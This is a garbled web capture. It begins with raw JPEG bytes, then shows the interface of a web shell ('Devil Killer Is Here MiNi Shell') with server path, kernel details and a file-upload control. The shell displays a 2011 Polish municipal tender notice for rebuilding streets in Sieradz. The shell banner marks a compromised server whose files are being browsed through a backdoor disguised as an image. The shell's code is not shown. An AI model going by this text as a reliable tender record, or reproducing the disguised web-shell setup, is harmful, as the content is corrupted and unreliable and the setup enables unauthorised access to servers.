JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111107/368258-N-2011.html

<p class="kh_header"><b>Sieradz: Przebudowa i zagospodarowanie ulic: Ogrodowej, Krótkiej, Dominikańskiej, Sukienniczej, Szewskiej, Rybnej, części ul. Zamkowej w Sieradzu wraz z infrastrukturą</b><br>
<b>Numer ogłoszenia: 368258 - 2011; data zamieszczenia: 07.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Sieradz , pl. Wojewódzki 1, 98-200 Sieradz, woj. łódzkie, tel. (043) 8266165, faks 043 822-30-05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sieradz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i zagospodarowanie ulic: Ogrodowej, Krótkiej, Dominikańskiej, Sukienniczej, Szewskiej, Rybnej, części ul. Zamkowej w Sieradzu wraz z infrastrukturą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje roboty budowlane, których celem  jest dostosowanie obszaru oraz rekonstrukcja utraconych wartości, nadających rangę miejskiemu centrum i zawiera następujące elementy:
Element 1 - Ulica Ogrodowa i ulica Krótka
Roboty drogowe
Należy wykonać przebudowę ulicy Ogrodowej na długości 205 + 28 m od ul. Kolegiackiej do ul. Kościuszki. Jezdnia o szerokości 4,2 - 4,8 m częściowo z pasem postojowym o szer. 2,5 m. Po obu stronach chodniki o zmiennej szerokości. 
Nawierzchnia jezdni z kostki granitowej 18/20 cm, krawężniki granitowe. Nawierzchnia chodników z płyt granitowych oraz kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm. 
Należy wykonać przebudowę ulicy Krótkiej na długości 71,5 m od ul. Ogrodowej do ul. Kościuszki. Jezdnia o szerokości 3,4 m. Po obu stronach chodniki  o zmiennej szerokości. Nawierzchnia jezdni z kostki granitowej 8/10 cm. Nawierzchnia chodników z płyt granitowych oraz kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm. 
Odwodnienie
Ulica Ogrodowa - odwodnienie ściekami do wpustów ulicznych. Wpusty należy wpiąć do projektowanego kanału deszczowego o250. 
Ulica Krótka - odwodnienie powierzchniowe.
Oświetlenie
Na ulicy Ogrodowej wykorzystano istniejącą linię kablową zasilającą oświetlenie i należy skorygować lokalizację punktów świetlnych. Na ulicy Krótkiej należy wykonać nową linię kablową oświetlenia ulicznego. Na obu ulicach przewiduje się montaż nowych latarni ulicznych.
Pozostałe roboty
Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury. 
Element 2 - Ulica Dominikańska
Roboty drogowe
Należy wykonać przebudowę ulicy Dominikańskiej na długości 215 m od Rynek do ul. Warszawskiej. Na odcinku Rynek - Kościół jezdnia o szerokości 3,15 m po stronie prawej pas ozdobny o szer. 1,45 m. Po obu stronach chodniki 
o zmiennej szerokości. Na odcinku Kościół - ul. Warszawska jezdnia szer. 5,0 m z pasem postojowym o szer. 2,3 m. 
Nawierzchnia jezdni z kostki granitowej 8/10 cm, w ciągu jezdni pasy poprzeczne z płyt granitowych, krawężniki granitowe. Pas ozdobny z kostki granitowej 4/6 cm. Nawierzchnia chodników z płyt granitowych oraz kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm.
Odwodnienie
Odwodnienie ściekami do wpustów ulicznych. Należy wykonać wymianę istniejących wpustów ulicznych. Wpusty wpiąć do istniejącej kanalizacji deszczowej o300.
Oświetlenie
Wykorzystano istniejącą linię kablową zasilającą oświetlenie. Wykonać korektę lokalizacji punktów świetlnych. Zamontować nowe oprawy oświetleniowe (halopaki) podświetlające drzewostan.
Pozostałe roboty
Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury, zieleń. 
Element 3 - Ulica Sukiennicza
Roboty drogowe
Należy wykonać przebudowę i  zagospodarowanie ulicy Sukienniczej na długości 188 m od ul. Szewskiej do ul. Wodnej. Parametry jezdni: na odcinku od ul. Szewskiej do ul. Zamkowej - szer. 3,0 m, między ul. Zamkową i ul. Wodną - szer. 5,0 m.  Chodniki obustronne o zmiennej szerokości. 
Jezdnia o nawierzchni bitumicznej, krawężniki granitowe.
Chodniki z płyt granitowych i kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm.
Odwodnienie
Odwodnienie ściekami do wpustów ulicznych. Należy wykonać wymianę starych wpustów  i dodatkowe nowe wpusty uliczne. Wpusty należy wpiąć do istniejącej kanalizacji deszczowej o250 i projektowanego kanału deszczowego o200-o250. 
Kanalizacja sanitarna
Od strony ul. Szewskiej należy wykonać odcinek sieci kanalizacji sanitarnej. Kanał z rur o200 PVC o długości 76,35 m.
Roboty branży elektrycznej
Oświetlenie uliczne
Na odcinku ul. Wodna - ul. Zamkowa i na skrzyżowaniu z ul. Zamkową należy wykonać nową linię kablową oświetlenia ulicznego. Na pozostałym odcinku wykorzystano istniejącą linię kablową zasilającą oświetlenie. Na całej ulicy zamontować nowe latarnie uliczne.
Przebudowa sieci elektroenergetycznej nN 0,4 kV.
Przebudowa sieci elektroenergetycznej polegać będzie na wymianie istniejących napowietrznych linii energetycznych i przyłączy do budynków na linie i przyłącza kablowe. 
Przebudowa istniejącej sieci elektroenergetycznej na ulicy Sukienniczej obejmuje:
- budowę linii kablowej 0,4 kV,
- budowę złączy kablowo-pomiarowych oraz złączy kablowych w trasie projektowanych linii kablowych 0,4 kV,
- demontaż istniejącej elektroenergetycznej sieci napowietrznej 0,4 kV wraz z przyłączami.
Przyłącza kablowe
W ramach przebudowy linii energetycznych istniejące przyłącza i zasilania budynków należy wymienić z napowietrznych na kablowe.
Zasilanie należy wykonać od nowych złączy kablowo-pomiarowych ZKP do tablic głównych w budynkach jednorodzinnych.
Kanalizacja telefoniczna
Na części ulicy Sukienniczej należy wybudować kanalizację teletechniczną wraz ze studzienkami kablowymi na potrzeby przeniesienia istniejących napowietrznych linii telefonicznych. Od projektowanych studni telefonicznych wybudować dopływy do poszczególnych budynków.
Pozostałe roboty
Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury. 
Element 4 - Ulica Szewska
Roboty drogowe
Należy wykonać przebudowę i  zagospodarowanie ulicy Szewskiej na długości 187 m od ul. Dominikańskiej do ul. Rybnej. Jezdnia o szerokości 3,5-5,5 m. Chodniki obustronne o zmiennej szerokości. 
Nawierzchnia jezdni do km 0 + 49,79 m z kostki granitowej 8/10 cm, na pozostałym odcinku bitumiczna, krawężniki granitowe. Chodniki z płyt granitowych i kostki granitowej 4/6 cm. Zjazdy do posesji z kostki granitowej 8/10 cm.
Odwodnienie
Odwodnienie ściekami do wpustów ulicznych. Należy wykonać wymianę starych wpustów  i dodatkowe nowe wpusty uliczne. Wpusty należy wpiąć do istniejącej kanalizacji deszczowej o300 i projektowanego kanału deszczowego o200. 
Kanalizacja sanitarna
W ulicy Szewskiej należy wykonać odcinek sieci kanalizacji sanitarnej. Kanał z rur o200 PVC o długości 113,10 m.
Roboty branży elektrycznej
Oświetlenie uliczne
Na odcinku ul. Rybna - ul. Żabia należy wykonać nową linię kablową oświetlenia ulicznego. Na pozostałym odcinku wykorzystano istniejącą linię kablową zasilającą oświetlenie. Na całej ulicy zamontować nowe latarnie uliczne.
Przebudowa sieci elektroenergetycznej nN 0,4 kV.
Przebudowę sieci elektroenergetycznej przewiduje się na odcinku ul. Rybna - ul. Żabia i polegać będzie na wymianie istniejących napowietrznych linii energetycznych i przyłączy do budynków na linie i przyłącza kablowe. 
Przebudowa istniejącej sieci elektroenergetycznej na ulicy Szewskiej obejmuje:
- budowę linii kablowej 0,4 kV,
- budowę złączy kablowo-pomiarowych oraz złączy kablowych w trasie projektowanych linii kablowych 0,4 kV,
- demontaż istniejącej elektroenergetycznej sieci napowietrznej 0,4 kV wraz z przyłączami.
Przyłącza kablowe
W ramach przebudowy linii energetycznych wszystkie istniejące przyłącza i zasilania budynków należy wymienić z napowietrznych na kablowe. 
Zasilanie należy wykonać od nowych złączy kablowo-pomiarowych ZKP do tablic głównych w budynkach jednorodzinnych.
W budynkach wielorodzinnych należy wykonać nowe zasilanie od zaprojektowanych złączy kablowych do tablic głównych w budynkach z zabezpieczeniami głównymi RG. Tablice główne RG w budynkach wymienić na nowe. Od tablic RG do liczników instalacja bez zmian.
Kanalizacja telefoniczna
Na ulicy Szewskiej należy wybudować kanalizację teletechniczną wraz ze studzienkami kablowymi na potrzeby przeniesienia istniejących napowietrznych linii telefonicznych. Od projektowanych studni telefonicznych wybudować dopływy do poszczególnych budynków.
Pozostałe roboty
Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury. 
Element 5 - Ulica Rybna
Roboty drogowe
Należy wykonać przebudowę i  zagospodarowanie ulicy Rybnej na długości 90 m od ul. Szewskiej do ul. Zamkowej. Jezdnia o szerokości 5,5 m. Chodniki obustronne o zmiennej szerokości. 
Nawierzchnia jezdni bitumiczna, krawężniki granitowe. Chodniki z płyt granitowych i kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm.
Odwodnienie
Odwodnienie ściekami do wpustów ulicznych. Wpusty należy wpiąć do projektowanego kanału deszczowego o250. 
Roboty branży elektrycznej
Oświetlenie uliczne
Należy wykonać nową linię kablową oświetlenia ulicznego. Zamontować nowe latarnie uliczne.
Przebudowa sieci elektroenergetycznej nN 0,4 kV.
Przebudowa sieci elektroenergetycznej polegać będzie na wymianie istniejących napowietrznych linii energetycznych i przyłączy do budynków na linie i przyłącza kablowe. 
Przebudowa istniejącej sieci elektroenergetycznej na ulicy Szewskiej obejmuje:
- budowę linii kablowej 0,4 kV,
- budowę złączy kablowo-pomiarowych oraz złączy kablowych w trasie projektowanych linii kablowych 0,4 kV,
- demontaż istniejącej elektroenergetycznej sieci napowietrznej 0,4 kV wraz z przyłączami.
Przyłącza kablowe
W ramach przebudowy linii energetycznych wszystkie istniejące przyłącza i zasilania budynków należy wymienić z napowietrznych na kablowe.
Zasilanie należy wykonać od nowych złączy kablowo-pomiarowych ZKP do tablic głównych w budynkach jednorodzinnych.
W budynkach wielorodzinnych należy wykonać nowe zasilanie od zaprojektowanych złączy kablowych do tablic głównych w budynkach z zabezpieczeniami głównymi RG. Tablice główne RG w budynkach wymienić na nowe. Od tablic RG do liczników instalacja bez zmian.
Kanalizacja telefoniczna
Na ulicy Rybnej należy wybudować kanalizację teletechniczną wraz ze studzienkami kablowymi na potrzeby przeniesienia istniejących napowietrznych linii telefonicznych. Od projektowanych studni telefonicznych wybudować dopływy do poszczególnych budynków.
Pozostałe roboty
Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury. 
Element 6 - Ulica Zamkowa wraz z parkingiem
Roboty drogowe
Należy wykonać przebudowę i zagospodarowanie ulicy Zamkowej na długości 240 m od skrzyżowania ul. Dominikańska - Rynek - ul. Zamkowa do koło 40 m za skrzyżowanie z ul. Rybną oraz parking dla samochodów osobowych. Parametry jezdni: na odcinku od Rynku do ul. Sukienniczej - szer. 4,0 m, między ul. Rybną i ul. Sukienniczą - szer. 5,0 m, od skrzyżowania z ul. Rybną - szer. 6,0 m. W km 0 + 123,08 po stronie południowej należy wykonać zjazd oraz parking dla samochodów osobowych na 40 miejsc postojowych, droga wewnętrzna o szer. 4,0 m 
i długości 33,64 m. Chodniki obustronne o zmiennej szerokości. 
Nawierzchnia jezdni: do km 0 + 143,88 m nawierzchnia z kostki granitowej 8/10 cm, na pozostałym odcinku nawierzchnia bitumiczna, krawężniki granitowe. Nawierzchnia drogi wewnętrznej oraz parkingu z kostki brukowej. 
Chodniki z płyt granitowych i kostki granitowej 4/6 cm. Zjazdy z kostki granitowej 8/10 cm.
Odwodnienie
Odwodnienie ściekami do wpustów ulicznych. Należy wykonać wymianę starych wpustów  i dodatkowe nowe wpusty uliczne. Wpusty należy wpiąć do istniejącej kanalizacji deszczowej o300. 
Roboty branży elektrycznej
Oświetlenie uliczne
Należy wymienić istniejące napowietrzne linie elektryczne na kablowe. Zamontować nowe latarnie uliczne.
Przebudowa sieci elektroenergetycznej nN 0,4 kV, SN 15 kV.
Przebudowa sieci elektroenergetycznej polegać będzie na wymianie istniejących napowietrznych linii energetycznych i przyłączy do budynków na linie i przyłącza kablowe. 
Przebudowa istniejącej sieci elektroenergetycznej na ul. Zamkowej obejmuje:
- budowę linii kablowej SN 15 kV od istniejącej kablowej linii 15 kV (poprzez mufę przejściową)  do projektowanej stacji transformatorowej o długości ok. 180 m, 
- wymianę istniejącego słupa przelotowego w linii napowietrznej 15 kV na słup odporowy  typu OGo 13,5/12,
- budowę linii kablowej średniego napięcia 15 kV od słupa typu Ogo13,5/12 w istniejącej napowietrznej linii 15 kV do projektowanej stacji transformatorowej o długości ok. 20 m,
- montaż stacji transformatorowej,
- budowę linii kablowej 0,4 kV,
- budowę złączy kablowo-pomiarowych oraz złączy kablowych w trasie projektowanych linii kablowych 0,4 kV,
- budowę słupów krańcowych w istniejących liniach napowietrznych 0,4 kV,
- odtworzenie zasilania istniejących linii napowietrznych 0,4 kV,
- demontaż istniejącej elektroenergetycznej sieci napowietrznej średniego napięcia 15 kV o długości ok. 20 m,    
- demontaż istniejącej elektroenergetycznej sieci napowietrznej 0,4 kV wraz z przyłączami.
Przyłącza kablowe
W ramach przebudowy linii energetycznych wszystkie istniejące przyłącza i zasilania budynków należy wymienić z napowietrznych na kablowe.
Zasilanie należy wykonać od nowych złączy kablowo-pomiarowych ZKP do tablic głównych w budynkach jednorodzinnych.
W budynkach wielorodzinnych należy wykonać nowe zasilanie od zaprojektowanych złączy kablowych do tablic głównych w budynkach z zabezpieczeniami głównymi RG. Tablice główne RG w budynkach wymienić na nowe. Od tablic RG do liczników instalacja bez zmian.
Kanalizacja telefoniczna
Na ulicy Zamkowej należy wybudować kanalizację teletechniczną wraz ze studzienkami kablowymi na potrzeby przeniesienia istniejących napowietrznych linii telefonicznych. Od projektowanych studni telefonicznych wybudować dopływy do poszczególnych budynków.
Pozostałe roboty
W km 0 + 137,98-143,88 należy wykonać bramę miejską w postaci 6 pylonów w konstrukcji stalowej obudowaną blokami granitowymi. Należy wykonać: roboty rozbiórkowe, likwidację kolizji, oznakowanie ulic, elementy małej architektury, zieleń. 
W ramach zamówienia należy wykonać: roboty budowlane i czynności określone w  dokumentacji projektowej, decyzjach oraz prace i czynności pomocnicze niezbędne dla prawidłowego wykonania przedmiotu zamówienia, tj. prowadzenie obsługi geodezyjnej, wykonanie wymaganych badań i sprawdzeń, wykonanie i utrzymanie zaplecza budowy, wykonanie dla potrzeb budowy podłączeń do mediów i ponoszenie kosztów ich zużycia, wykonanie dokumentacji powykonawczej, itp., a także prace porządkowe terenu w rejonie realizacji robót. Wykonawca jest zobowiązany prowadzić prace zgodnie z dokumentacją projektową, w tym zgodnie z wszystkimi decyzjami, postanowieniami, uzgodnieniami i warunkami. Wykonawca jest zobowiązany uzyskać od zarządcy drogi decyzję o zajęciu pasa drogowego, opracować i uzgodnić projekt organizacji ruchu na czas prowadzenia robót budowlanych w pasie drogowym. 
Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja przetargowa składająca się z projektu budowlanego i wykonawczego, projektów organizacji ruchu, STWiORB oraz dokumentacji określającej zasady postępowania przetargowego.
Wykonawca jest zobowiązany wykonać wszystkie roboty branżowe i sieciowe oraz uzyskać dokumenty potwierdzające prawidłowość ich wykonania, w przypadku robót sieciowych np.: elektrycznych, telekomunikacyjnych, czy wodno-kanalizacyjnych. Dokumentem potwierdzającym prawidłowość wykonania robót będzie protokół odbioru robót z udziałem przedstawiciela gestora sieci (np.: w przypadku rozbudowy sieci energetycznej przedstawiciela PGE uprawnionego do pełnienia czynności odbiorowych, w przypadku rozbudowy sieci telekomunikacji przedstawiciela telekomunikacji uprawnionego do pełnienia czynności odbiorowych, itd.).
Wykonawca jest zobowiązany do przeprowadzenia wszystkich czynności, działań umożliwiających uzyskanie oraz uzyskać decyzję o pozwoleniu na użytkowanie obiektu. 
Zamawiający przy realizacji zamówienia dopuszcza zastosowanie równoważnych wyrobów budowlanych. W związku z użyciem przez Projektantów w dokumentacji projektowej nazw własnych wyrobów budowlanych i urządzeń Zamawiający oświadcza, że mają one charakter przykładowy umożliwiający Wykonawcom dokonanie oceny czy ewentualnie proponowane przez nich wyroby budowlane lub urządzenia spełniają wymóg równoważności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.90-8, 45.23.13.00-8, 45.23.21.30-2, 45.23.14.00-9, 45.31.12.00-2, 45.23.22.21-7, 45.31.61.00-6, 45.23.23.10-8, 45.23.32.93-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 150.000,00 zł (słownie złotych: sto pięćdziesiąt tysięcy).
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy PZP, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z póź. zm.).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego: Bank  PKO BP O/Sieradz  Nr  86 1020 4564 0000 5502 0040 9680
5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - w Wydziale Finansowym w pok. 19, a kserokopię dokumentu należy załączyć do oferty.
7.Nie wniesienie wadium przed upływem terminu składania ofert spowoduje wykluczenie Wykonawcy na podstawie 
art. 24 ust. 2 pkt. 2 ustawy PZP, a jego oferta zostanie uznana za odrzuconą na podstawie art. 89 ust. 1 pkt. 5 w związku z art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby w wykonywaniu zamówienia uczestniczyła osoba mogącą pełnić funkcję:
-  kierownika budowy posiadająca: wykształcenie wyższe techniczne (dyplom inżyniera lub mgr inżyniera budownictwa lądowego), uprawnienia budowlane w specjalności drogowej lub konstrukcyjno-budowlanej w zakresie dróg, aktualne zaświadczenie o wpisie do izby inżynierów budownictwa, doświadczenie minimum pięć lat pracy na stanowisku kierownika budowy lub robót,
-  kierownika robót posiadająca: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, aktualne zaświadczenie o wpisie do izby inżynierów budownictwa, doświadczenie minimum pięć lat pracy na stanowisku kierownika  robót</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykaz zawierał co najmniej:
-  dwie prace polegające na wykonaniu dróg lub placów o nawierzchni z kostki kamiennej o powierzchni min. 4.000 m2 każda w obrębie obszarów objętych strefą ochrony konserwatorskiej wraz z dokumentami potwierdzającymi należyte wykonanie prac (dokumentem potwierdzającym, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone może być np.: protokół odbioru końcowego robót wykonanych wcześniej lub referencje Zamawiającego)
- jedną pracę polegającą na wykonaniu min. 1,0 km kablowej linii energetycznej NN lub SN wraz z dokumentami potwierdzającymi należyte wykonanie prac (dokumentem potwierdzającym, że roboty zostały wykonane zgodnie z zasadami sztuki budowlane i prawidłowo ukończone może być np.: protokół odbioru końcowego robót wykonanych wcześniej lub referencje Zamawiającego)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca zatrudniał w każdym roku średnio co najmniej15 pracowników</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby w wykonywaniu zamówienia uczestniczyła osoba mogącą pełnić funkcję:
-  kierownika budowy posiadająca: wykształcenie wyższe techniczne (dyplom inżyniera lub mgr inżyniera budownictwa lądowego), uprawnienia budowlane w specjalności drogowej lub konstrukcyjno-budowlanej w zakresie dróg, aktualne zaświadczenie o wpisie do izby inżynierów budownictwa, doświadczenie minimum pięć lat pracy na stanowisku kierownika budowy lub robót,
-  kierownika robót posiadająca: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, aktualne zaświadczenie o wpisie do izby inżynierów budownictwa, doświadczenie minimum pięć lat pracy na stanowisku kierownika  robót</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający wymaga, aby Wykonawca posiadał środki finansowe lub zdolność kredytową na kwotę  min. 1.000.000,00 złotych i informacja była wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Na potwierdzenie spełnienia warunku Wykonawca przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej.
